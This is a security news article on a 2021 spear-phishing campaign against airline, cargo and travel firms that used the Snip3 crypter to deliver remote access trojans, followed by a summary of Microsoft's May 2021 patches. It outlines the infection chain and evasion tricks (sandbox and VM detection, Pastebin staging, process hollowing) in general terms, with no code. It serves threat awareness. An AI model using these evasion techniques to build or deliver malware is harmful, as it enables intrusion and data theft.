Microsoft discovered a spear-phishing campaign in the wild targeting airline, cargo, and travel industries with multiple Remote Access Trojans (RATs). The technology giant stated that attackers distributed malware payloads via phishing emails imitating legitimate businesses with malicious image and PDF attachments.
“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.
In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT. pic.twitter.com/aeMfUUoVvf
— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021
Stealthy Malware Loader
Threat actors leverage multiple RATs to exfiltrate sensitive data from critical systems by adding extra malware payloads. According to cybersecurity firm Morphisec, RATs are delivered via a new and stealthy malware loader Crypter-as-a-Service that spreads them onto targeted machines.
The Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RAT, Agent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems. Snip3 implements several advanced techniques to bypass detection, such as:
- Executing PowerShell code with the Remotesigned parameter
- Validating the existence of Windows Sandbox and VMWare virtualization
- Using Pastebin and top4top for staging
- Compiling RunPE loaders on the endpoint in runtime
Once the malicious attachment is downloaded, the first-stage VBScript VBS files will be installed simultaneously executing the second-stage PowerShell script, which in turn executes the final RAT payload using Process Hollowing.
“The Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing detection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and others. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like it employ,” Morphisec said.
Microsoft Fixes 55 Flaws
In a recent development, Microsoft’s May Patch Tuesday security update addressed over 55 vulnerabilities including four critically rated Zero-Day bugs. The now patched Zero-Day vulnerabilities include CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability, CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability, and Zero Day Initiative flagged CVE-2021-31166.